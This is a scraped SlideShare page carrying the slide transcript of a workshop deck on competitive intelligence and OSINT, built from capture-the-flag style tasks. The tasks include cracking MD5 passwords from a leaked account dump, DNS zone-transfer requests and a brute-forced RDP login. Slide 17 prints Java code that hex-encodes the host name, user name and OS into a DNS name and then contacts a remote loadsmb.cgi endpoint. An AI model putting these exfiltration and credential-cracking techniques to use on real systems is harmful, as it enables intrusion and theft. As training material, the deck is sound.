Your SlideShare is downloading. ×
0
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Security Hole #11 - Competitive intelligence - Beliaiev
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Security Hole #11 - Competitive intelligence - Beliaiev

1,202

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,202
On Slideshare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
5
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Competitive Intelligence – Competitor's Fatality Igor Beliaiev
  • 2. What is Competitive Intelligence(CI)?
  • 3. Basic methods
  • 4. Start is here: goo.gl/ygm51k Інфо ебаут хак The Workshop
  • 5. Task #1. Intro We know that Mikko Kuttonen is using github. His github for working staff is mikkoKut1 You have to find his password for the home media server(107.170.*.*).
  • 6. Task #2. Pakistani There is a hacker from Pakistan. He is paid for hunting for a different journalists, that show how things in Ukraine are going on during the revolution. We have some information about his last attacks, so we have to find out what he has done with his victims.
  • 7. We have some dump with journalist's accounts on times.com. (times.zip) Let's find any password, that he could hack. We know that only one of those accounts got hacked, so we have to find the easiest password. Task #2. Pakistani Hint! Journalist’s passwords are encrypted with MD5 algorithm Hint! You can use MD5 online decoders
  • 8. Task #3. Archive As you can see, we also have another archive with file zik.doc, which we need, but it's encrypted. We need to read the data from zikua.doc Hint! Look carefully for the files in archives. Are there any common things? Hint! You might also use some tools, which you have got with the tasks. But remember, you don’t have much time.
  • 9. Task #4. Zik.ua From the previous task we have got information, that there are some important files on torrent server on a*****.zik.ua We need to find the subdomain and torrent server. Hint! DNS-requests might help you Hint! You can try to use AXFR-requests
  • 10. $1mln/month ValveSoftware.com
  • 11. Task #5. Find the hacker Finally we managed to find the real IP address of Pakistani hacker, and even bruteforce his RDP password. We started to download his private files, but suddenly connection was lost...forever. We managed to download only one file. Using this file, find the name of the hacker!
  • 12. Task #5. Find the hacker
  • 13. • Nickname: johnsmith@athc.biz • Find his place and date of birth Tasks from PHDays
  • 14. Tasks from PHDays
  • 15. Tasks from PHDays
  • 16. Tasks from PHDays
  • 17. Tasks from PHDays String str1 = System.getProperty("os.name"); String str2 = System.getProperty("user.name"); InetAddress localInetAddress2 = InetAddress.getLocalHost(); InetAddress[] arrayOfInetAddress = InetAddress.getAllByName(localInetAddress2.getCanonicalHostName()); String str3 = arrayOfInetAddress[0].toString(); InetAddress localInetAddress1 = InetAddress.getLocalHost(); String str4 = localInetAddress1.getHostName(); String str5 = toHexString(str4.getBytes()) + toHexString("|".getBytes()) + toHexString(str2.getBytes()) + toHexString("|".getBytes()) + toHexString(str1.getBytes()); if (str5.length() > 63) { str5 = str5.substring(0, 63); } Socket localSocket = new Socket(str5 + paramString2, 80); String str6 = readAll(localSocket); String str7 = "access=true"; if (str6.contains(str7)) { localSocket = new Socket(paramString1 + "/loadsmb.cgi?host=" + str3 + "&file=/", 80);
  • 18. Tasks from PHDays + WebRTC (net.ipcalf.com)
  • 19. Tasks from PHDays
  • 20. ? ?

×